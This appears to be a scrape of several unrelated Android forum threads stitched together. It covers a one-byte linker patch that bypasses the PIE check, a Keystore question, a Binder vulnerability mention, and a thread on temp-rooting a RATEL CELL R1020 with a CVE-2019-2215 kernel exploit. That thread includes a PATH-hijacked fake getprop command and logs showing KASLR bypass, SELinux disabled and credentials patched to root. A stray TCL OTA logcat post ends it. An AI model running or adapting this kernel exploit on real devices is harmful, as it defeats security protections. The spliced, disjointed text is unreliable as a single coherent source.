Related
Last month, Chainfire posted a nice writeup on several new security changes happening upstream in AOSP. There has been much discussion of the SELinux changes and what that means for root apps, but I'd like to touch on another change that can affect even garden variety non-root apps: mandatory PIE (position-independent executables).
If you're running the Android "L" developer preview image, you may have noticed that some of your native binaries no longer execute:
Code:
$ ./curl --help
error: only position independent executables (PIE) are supported.
PIE is a useful security feature, as randomizing the address space makes it significantly more difficult for an attacker to exploit bugs in a program. However, in this case, one must trade off compatibility for security: PIE is only available in JB 4.1 and above, so most app developers targeting a wide range of Android versions have disabled PIE in their builds. The new PIE check in "L" will cause breakage for most apps that ship native executables.
As it turns out, even some of the precompiled binaries shipped with Android itself are affected, and Google has temporarily disabled PIE enforcement. It is not clear whether they will re-enable it at a later date.
Since the Android "L" preview images were built prior to Google's latest change, they still have PIE enabled. I am attaching a flashable "bypass-pie.zip" which overwrites one byte in /system/bin/linker to bypass the PIE check:
Code:
3a06: f8c6 5098 str.w r5, [r6, #152] ; 0x98
3a0a: f8c6 4100 str.w r4, [r6, #256] ; 0x100
3a0e: 8a0a ldrh r2, [r1, #16]
3a10: 2a03 cmp r2, #3
3a12: d007 beq.n 3a24 // change to e007 (b.n)
3a14: 4992 ldr r1, [pc, #584] ; (3c60)
3a16: 2002 movs r0, #2
3a18: 4479 add r1, pc
Use this at your own risk. It works for me. The same non-PIE curl binary now runs correctly with the patched linker:
Code:
$ ./curl --help
Usage: curl [options...] <url>
Options: (H) means HTTP/HTTPS only, (F) means FTP only
--anyauth Pick "any" authentication method (H)
-a, --append Append to target file when uploading (F/SFTP)
--basic Use HTTP Basic Authentication (H)
--cacert FILE CA certificate to verify peer against (SSL)
[...]
This was tested on hammerhead-lpv79-preview-ac1d8a8e.tgz. If somebody wants to test on razor-lpv79-preview-d0ddf8ce.tgz and post the result, that would be helpful.
It is not necessary to wipe any caches after flashing, although you may want to "clear data" for any apps that were crashing prior to applying the change so that they can start fresh.
Update 2014/07/21: AOSP has re-enabled the PIE check after recompiling their last non-PIE binary. I filed a ticket asking Google to revert this change in order to avoid breaking ABI compatibility.
Does this fixes the root access issue with titanium backup, helium and a bunch of other root apps?
so which one should we use to have proper root curl or the pie bypass
---------- Post added at 06:22 PM ---------- Previous post was at 06:20 PM ----------
never mind even using piebypass still gives me app optimizing process ,, ill try the curl zip
itskapil said:
Does this fixes the root access issue with titanium backup, helium and a bunch of other root apps?
Click to expand...
Click to collapse
No it doesn't. I don't think it is the problem that this aims to fix.
itskapil said:
Does this fixes the root access issue with titanium backup, helium and a bunch of other root apps?
Click to expand...
Click to collapse
Smh
Sent from my Nexus 5 using Tapatalk
It fixes the twitter issue though. Cheers!
shanyel said:
It fixes the twitter issue though. Cheers!
Click to expand...
Click to collapse
Twitter still doesn't work for me...
BTW do I have to wipe cache and dalvik cache after flashing?
CrashOverride1995 said:
Twitter still doesn't work for me...
BTW do I have to wipe cache and dalvik cache after flashing?
Click to expand...
Click to collapse
CrashOverride1995 said:
Twitter still doesn't work for me...
BTW do I have to wipe cache and dalvik cache after flashing?
Click to expand...
Click to collapse
CrashOverride1995 said:
Twitter still doesn't work for me...
BTW do I have to wipe cache and dalvik cache after flashing?
Click to expand...
Click to collapse
Yes I did
Nice thanks for the share!
Thank you. This fixed Dropbox for me.
Well it did, now fc again.
cernekee said:
Last month, Chainfire posted a nice writeup on several new security changes happening upstream in AOSP. There has been much discussion of the SELinux changes and what that means for root apps, but I'd like to touch on another change that can affect even garden variety non-root apps: mandatory PIE (position-independent executables).
If you're running the Android "L" developer preview image, you may have noticed that some of your native binaries no longer execute:
Code:
$ ./curl --help
error: only position independent executables (PIE) are supported.
PIE is a useful security feature, as randomizing the address space makes it significantly more difficult for an attacker to exploit bugs in a program. However, in this case, one must trade off compatibility for security: PIE is only available in JB 4.1 and above, so most app developers targeting a wide range of Android versions have disabled PIE in their builds. The new PIE check in "L" will cause breakage for most apps that ship native executables.
As it turns out, even some of the precompiled binaries shipped with Android itself are affected, and Google has temporarily disabled PIE enforcement. It is not clear whether they will re-enable it at a later date.
Since the Android "L" preview images were built prior to Google's latest change, they still have PIE enabled. I am attaching a flashable "bypass-pie.zip" which overwrites one byte in /system/bin/linker to bypass the PIE check:
Code:
3a06: f8c6 5098 str.w r5, [r6, #152] ; 0x98
3a0a: f8c6 4100 str.w r4, [r6, #256] ; 0x100
3a0e: 8a0a ldrh r2, [r1, #16]
3a10: 2a03 cmp r2, #3
3a12: d007 beq.n 3a24 // change to e007 (b.n)
3a14: 4992 ldr r1, [pc, #584] ; (3c60)
3a16: 2002 movs r0, #2
3a18: 4479 add r1, pc
Use this at your own risk. It works for me. The same non-PIE curl binary now runs correctly with the patched linker:
Code:
$ ./curl --help
Usage: curl [options...] <url>
Options: (H) means HTTP/HTTPS only, (F) means FTP only
--anyauth Pick "any" authentication method (H)
-a, --append Append to target file when uploading (F/SFTP)
--basic Use HTTP Basic Authentication (H)
--cacert FILE CA certificate to verify peer against (SSL)
[...]
This was tested on hammerhead-lpv79-preview-ac1d8a8e.tgz. If somebody wants to test on razor-lpv79-preview-d0ddf8ce.tgz and post the result, that would be helpful.
It is not necessary to wipe any caches after flashing, although you may want to "clear data" for any apps that were crashing prior to applying the change so that they can start fresh.
Click to expand...
Click to collapse
This runs fine on razor-lpv-79-preview!
I can use Dropbox now...
Thanks a lot!!!
Add the linker option ...
Add "-fPIE -pie" linker option..
For those still getting PIE errors in the latest L build (lpx13d), I found that the binary linked in this thread will not work as a drop-in fix for that. After checking the binaries, they are in fact different, however I managed to repatch the newer binary with the same fix. I have yet to actually test this modification, but it's the same patch in principle:
Code:
.text:000032D4 STR.W R5, [R6,#0x98]
.text:000032D8 STR.W R4, [R6,#0x100]
.text:000032DC LDRH R2, [R1,#0x10]
.text:000032DE CMP R2, #3
.text:000032E0 BEQ loc_32F2 <---- replace D007 (07 D0) with E007 (07 E0, B loc_32F2)
.text:000032E2 LDR R1, =(aErrorOnlyPosit - 0x32EA)
.text:000032E4 MOVS R0, #2
.text:000032E6 ADD R1, PC ; "error: only position independent execut"...
.text:000032E8 BL __dl___libc_format_fd
ZIP attached, again, I have no idea if this works or not. But for those who needed the patch previously, it's here again.
EDIT: Fixes several issues for me, and doesn't crash like the previous executable did. So far it fixes the actual PIE issues in SSHTunnel (although it can't do global IPTABLES support still) and it fixes SSHDroid's PIE issues.
EDIT 2: Fixes ES File Explorer as well.
^ thank you sir I just updated my N5 to the 13d build and when I re booted most of my root apps were borked, so I looked for a fix and I flashed the zip. and it actually fixed my issues,
I don't know if that was the intended results but that is what came out for me
shinyquagsire23 said:
For those still getting PIE errors in the latest L build (lpx13d), I found that the binary linked in this thread will not work as a drop-in fix for that. After checking the binaries, they are in fact different, however I managed to repatch the newer binary with the same fix. I have yet to actually test this modification, but it's the same patch in principle:
Code:
.text:000032D4 STR.W R5, [R6,#0x98]
.text:000032D8 STR.W R4, [R6,#0x100]
.text:000032DC LDRH R2, [R1,#0x10]
.text:000032DE CMP R2, #3
.text:000032E0 BEQ loc_32F2 <---- replace D007 (07 D0) with E007 (07 E0, B loc_32F2)
.text:000032E2 LDR R1, =(aErrorOnlyPosit - 0x32EA)
.text:000032E4 MOVS R0, #2
.text:000032E6 ADD R1, PC ; "error: only position independent execut"...
.text:000032E8 BL __dl___libc_format_fd
ZIP attached, again, I have no idea if this works or not. But for those who needed the patch previously, it's here again.
EDIT: Fixes several issues for me, and doesn't crash like the previous executable did. So far it fixes the actual PIE issues in SSHTunnel (although it can't do global IPTABLES support still) and it fixes SSHDroid's PIE issues.
EDIT 2: Fixes ES File Explorer as well.
Click to expand...
Click to collapse
thanks gonna test this on mako
Edit: this works great on the N6 leak mako rom, great work, this made quite a few thousand ppl happy, good work man
This has fixed the VPN issue for me, Hotspot shield is working perfectly now!
THANK YOU!
Has anyone tried the last patch on the razor?
gr4ce said:
Has anyone tried the last patch on the razor?
Click to expand...
Click to collapse
Seems to be working for me on FLO. Root is working as it should foe ES file Explorer ?
\o/
Thanks for the patch! This fixed TitaniumBackup for me. Tested with Hammerhead and Flo on LPX13D.
Sorry for asking but we also have to flash the curl file or just the pie.zip ? Thanks.
Hi xda,
Trying to run keystore APIs on dragonboard 410c, which has android-5 lollipop release.
Referring the (developer.android.com/training/articles/keystore.html) Keystore training article to get keystore instance.
But always getting error that AndroidKeyStore doesn't exist, no such provider exception.
Also tried getting all the security providers on board by java.security.Security.getProviders(), but no luck. Although AndroidOpenSsl, BC providers exist, but no AndroidKeyStore provider.
In above link, it is specified that
AndroidKeyStore provider introduced in Android 4.3 (API level 18).
Click to expand...
Click to collapse
We tried with API 21 to 23 but still same issue, Can someone point me what I'm doing wrong.
About a news rencently "Water Drops" Attack: Explain the Binder Kernel Passing Vulne
360 find this Vuln . some people who are good at system would find a way to root mate20 Avoid unlock bl?
http://blogs.360.cn/post/Binder_Kernel_Vul_CH.html
Hello,
I have a device called RATEL CELL R1020 with OS android 8.0 oreo.
I tried some applications for rooting this smartphone like kingroot, kingoroot, etc but failed. This device can't unlock bootloader, so I see rooting with exploit in youtube like thomasking. Please anyone here help me to rooting my smartphone?
4.4.78perf+ kernel
this attachment is screenshot of the system
Thankyou
j4nn said:
@arifincaesar, do you have your phone's firmware in a downloadable form? Can you obtain linux kernel source code for your phone?
I could imagine adapting this (exploit source code here) for your phone, but the kernel binary that is running on the phone is a must pre-requisite. Obviously it would be only a temp root.
Click to expand...
Click to collapse
arifincaesar said:
there is no way to get firmware of this phone sir..
and there's no way to unlock bootloader..
i think the only way to backup firmware this device is exploit and getting root access without ubl..
there is just said 4.4.78-perf+
Click to expand...
Click to collapse
In my opinion, there is no exploit that would not need offsets within kernel image in advance.
Because of that you need a copy of kernel binary that is running on the phone.
Obviously it is not possible to back up kernel partition from the phone, so you would need the original fw (the same version that is running on the phone) and a way to extract the kernel from the fw package.
Without that you are out of luck, sorry...
Since there is linux kernel running on the phone (android uses linux kernel) you have legal options to request corresponding kernel source code, because linux kernel is distributed under gpl license.
But even if you obtained the kernel source, you would still need the binary, because most likely the new build from source would not be binary identical. The source code would just make it easy to decide which exploit could work, so it would make sense to adapt it for the kernel binary.
j4nn said:
In my opinion, there is no exploit that would not need offsets within kernel image in advance.
Because of that you need a copy of kernel binary that is running on the phone.
Obviously it is not possible to back up kernel partition from the phone, so you would need the original fw (the same version that is running on the phone) and a way to extract the kernel from the fw package.
Without that you are out of luck, sorry...
Since there is linux kernel running on the phone (android uses linux kernel) you have legal options to request corresponding kernel source code, because linux kernel is distributed under gpl license.
But even if you obtained the kernel source, you would still need the binary, because most likely the new build from source would not be binary identical. The source code would just make it easy to decide which exploit could work, so it would make sense to adapt it for the kernel binary.
Click to expand...
Click to collapse
is that bug when i had activated oem unlock in dev options but cannot unlock with fastboot mode?
j4nn said:
In my opinion, there is no exploit that would not need offsets within kernel image in advance.
Because of that you need a copy of kernel binary that is running on the phone.
Obviously it is not possible to back up kernel partition from the phone, so you would need the original fw (the same version that is running on the phone) and a way to extract the kernel from the fw package.
Without that you are out of luck, sorry...
Since there is linux kernel running on the phone (android uses linux kernel) you have legal options to request corresponding kernel source code, because linux kernel is distributed under gpl license.
But even if you obtained the kernel source, you would still need the binary, because most likely the new build from source would not be binary identical. The source code would just make it easy to decide which exploit could work, so it would make sense to adapt it for the kernel binary.
Click to expand...
Click to collapse
can you help me please?
arifincaesar said:
can you help me please?
Click to expand...
Click to collapse
Interesting. Getting kernel space R/W primitives is a nice first step.
But without kernel binary, that still may be difficult - with kernel 4.4.78 version, KASLR would be there for sure.
j4nn said:
Interesting. Getting kernel space R/W primitives is a nice first step.
But without kernel binary, that still may be difficult - with kernel 4.4.78 version, KASLR would be there for sure.
Click to expand...
Click to collapse
hehe i keep watching your work for exploit sir
if there something new exploit i'll try to my phone
thx before
@arifincaesar, try this please:
Code:
cd /data/local/tmp
echo -e '#!/system/bin/sh\ncase "$1" in\n*model) echo G8441 ;;*) echo 47.1.A.8.49 ;;esac' > getprop
chmod 755 getprop
PATH=`pwd`:$PATH ./bindershell
That should try the offsets defined for xz1c. It's a blind try, but let's see.
Please post the log in a text form (copy it via clipboard from the terminal), using the CODE tags in the message (can be used with the # icon in advanced post).
Code:
cd /data/local/tmp
echo -e '#!/system/bin/sh\ncase "$1" in\n*model) echo G8441 ;;*) echo 47.1.A.8.49 ;;esac' > getprop
chmod 755 getprop
PATH=`pwd`:$PATH ./bindershell
i can't believe, it work bro i swear :v
is that my phone rooted?
nope i think my phone is not rooted yet..
i check from root checker it say "sorry root access is not properly installed on this device."
@j4nn heres the output
bindershell - temp root shell for xperia XZ1c/XZ1/XZp using CVE-2019-2215
https://github.com/j4nn/renoshell/tree/CVE-2019-2215
MAIN: starting exploit for devices with waitqueue at 0x98
PARENT: Reading leaked data
PARENT: leaking successful
MAIN: thread_info should be in stack
MAIN: parsing kernel stack to find thread_info
PARENT: Reading leaked data
PARENT: Reading extra leaked data
PARENT: leaking successful
MAIN: task_struct_ptr = ffffffcfe0d68000
MAIN: thread_info_ptr = ffffffd04aa3c000
MAIN: Clobbering addr_limit
MAIN: should have stable kernel R/W now
kernel slide invalid (0x4ffabc7b50)
kaslr slide 0x0
selinux set to permissive
current task credentials patched
got root, start shell...
Cell:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:shell:s0
Cell:/data/local/tmp # cd
Cell:/ # ls
ls: ./cache: Permission denied
ls: ./init: Permission denied
ls: ./init.environ.rc: Permission denied
ls: ./init.rc: Permission denied
ls: ./init.recovery.qcom.rc: Permission denied
ls: ./init.usb.configfs.rc: Permission denied
ls: ./init.usb.rc: Permission denied
ls: ./init.zygote32.rc: Permission denied
ls: ./init.zygote64_32.rc: Permission denied
ls: ./postinstall: Permission denied
ls: ./ueventd.rc: Permission denied
ls: ./verity_key: Permission denied
acct bt_firmware bugreports charger config d data default.prop dev dsp etc firmware lost+found mnt oem persist proc res root sbin sdcard storage sys system vendor
1|Cell:/ #
@arifincaesar, well, as expected, detecting KASLR slide failed, therefore selinux could not be disabled and security context has not been patched either.
Without a kernel binary, it is difficult to implement a full temp root exploit.
I guess it could be doable, unfortunately I do not have the time for it.
j4nn said:
@arifincaesar, well, as expected, detecting KASLR slide failed, therefore selinux could not be disabled and security context has not been patched either.
Without a kernel binary, it is difficult to implement a full temp root exploit.
I guess it could be doable, unfortunately I do not have the time for it.
Click to expand...
Click to collapse
hehe thanks for information sir..
@arifincaesar, see PM please...
j4nn said:
@arifincaesar, see PM please...
Click to expand...
Click to collapse
ok sir, thank you very much for helping me.. T_T
pm sent
cve-2019-2215 based temp root exploit for ratel cell r1020
Here is a temp root exploit tailored specifically for RATEL CELL r1020 phone as described in the OP (Android 8.0 with security patch level of January 5, 2018). The exploit uses CVE-2019-2215, which can get you a temporal root shell very quickly and reliably (it's nearly instant).
Unfortunately RATEL CELL r1020 firmware is not publicly available, so it had not been possible to get a kernel image for analysis.
Luckily the first stage of the exploit designed for sony xperia xz1/xz1/xz1c worked, providing kernel space R/W primitives.
Eventually kernel memory dump has been retrieved (after KASLR bypass done in a generic way), so implementation of the final stage to bypass selinux and patch credentials to get root could be done.
Please find the result of my work attached here, it obviously is not tested as I do not have that phone, but I assume it would work as using similarly calculated stuff worked with my xz1c phone.
Please see the xperia phones exploit here for usage howto, including possibility to setup magisk from the exploit (modified script without sony specific stuff is already included). Just download the Magisk-v19.3-Manager-v7.1.2.zip from the linked post and use together with stuff from ratel-cell-temp-root.zip attached here.
EDIT: Updated ratel cell temp root with v2, supposed to work also with ratel cell having May 1, 2018 security patch level.
Please post the log (in [ CODE ] tags) and/or screenshots from your testing, possibly including even magisk setup, if bindershell exploit worked.
If you like my work, you can donate to me via paypal (including card payment) or bitcoin - for details just follow the "Donate to Me" button please. Thank you.
Thread closed per OP request.
MOD ACTION:
Thread reopened per OP's request
j4nn said:
Here is a temp root exploit tailored specifically for RATEL CELL r1020 phone as described in the OP (Android 8.0 with security patch level of January 5, 2018). The exploit uses CVE-2019-2215, which can get you a temporal root shell very quickly and reliably (it's nearly instant).
Unfortunately RATEL CELL r1020 firmware is not publicly available, so it had not been possible to get a kernel image for analysis.
Luckily the first stage of the exploit designed for sony xperia xz1/xz1/xz1c worked, providing kernel space R/W primitives.
Eventually kernel memory dump has been retrieved (after KASLR bypass done in a generic way), so implementation of the final stage to bypass selinux and patch credentials to get root could be done.
Please find the result of my work attached here, it obviously is not tested as I do not have that phone, but I assume it would work as using similarly calculated stuff worked with my xz1c phone.
Please see the xperia phones exploit here for usage howto, including possibility to setup magisk from the exploit (modified script without sony specific stuff is already included). Just download the Magisk-v19.3-Manager-v7.1.2.zip from the linked post and use together with stuff from ratel-cell-temp-root.zip attached here.
Please post the log (in [ CODE ] tags) and/or screenshots from your testing, possibly including even magisk setup, if bindershell exploit worked.
Click to expand...
Click to collapse
yes, it work sir thank you so much here is the log
but i think there other problem i will posting it later here
Code:
Cell:/data/local/tmp $ ./bindershellnew
bindershell - temp root shell using CVE-2019-2215, tailored for RATEL CELL R1020
https://github.com/j4nn/renoshell/tree/CVE-2019-2215
MAIN: starting exploit for devices with waitqueue at 0x98
PARENT: Reading leaked data
PARENT: leaking successful
MAIN: thread_info should be in stack
MAIN: parsing kernel stack to find thread_info
PARENT: Reading leaked data
PARENT: Reading extra leaked data
PARENT: leaking successful
MAIN: task_struct_ptr = ffffffd4316e9b00
MAIN: thread_info_ptr = ffffffd471268000
MAIN: Clobbering addr_limit
MAIN: should have stable kernel R/W now
attempting kaslr bypass: leaked ptr 0xffffff8a82608658
kernel base=0xffffff8a81480000 slide=0xa79400000
selinux set to permissive
current task credentials patched
got root, start shell...
Cell:/data/local/tmp # getenforce
Permissive
Cell:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:toolbox:s0
Cell:/data/local/tmp # uname -a
Linux localhost 4.4.78-perf+ #1 SMP PREEMPT Tue Mar 6 11:00:11 CST 2018 aarch64
Cell:/data/local/tmp #
Hi there sir @j4nn .
I'm yusuv, ratel cell user. I've been following this thread.
And lately seems the exploit works as intended.
The things is, ratel cell not only have the January patch on all the devices. I've tried the exploit and its stuck on the build number prop and it won't go any further.
Afaik, ratel have 2 ROM builds, one patch is January which is you build the exploit for, the other one is May 1, 2018 patch. With also different build number.
On behalf Ratel Cell user with the may patch. I'm here to ask you, is there any way for us with the May patch being able to root our device?
Thanks in advance.
Dear sir @j4nn.
can you help us on how to install custom recovery in Ratel Cell, if you are willing to help, we will be very grateful.
Just got the April OTA offer. Weird for TCL to do an update this fast since last one was for March.
Hopefully everyone by now knows how to pull log cat, if not reference my previous post.
3.0.8AI7 TCL 10 Pro Android 11 Firmware OTA 0.9GB March 2022
Just got first OTA offers since August 2021. From what I can tell TCL is atleast sending out updates twice a year. In security settings I was able to perform Google Play system update and get March 1, 2022 security updates. Pulling the...
forum.xda-developers.com
Or use application called ADB app control https://adbappcontrol.com/en/
If pulling entire log cat like I do, save yourself some time and search for "small task url".
Here are the links pulled from my logcat of the newest update:
OtaApp###D: small task url = https://g2slave-us-east-01.tclcom.com/64c9b63f5a85fdd27b552eec614f884add8fdb67/35/762335
OtaApp###D: small task url = https://g2slave-ap-south-01.tclcom.com/64c9b63f5a85fdd27b552eec614f884add8fdb67/35/762335
OtaApp###D: small task url = https://g2slave-eu-west-01.tclcom.com/64c9b63f5a85fdd27b552eec614f884add8fdb67/35/762335
OtaApp###D: small task url = https://g2slave-ap-north-01.tclcom.com/64c9b63f5a85fdd27b552eec614f884add8fdb67/35/762335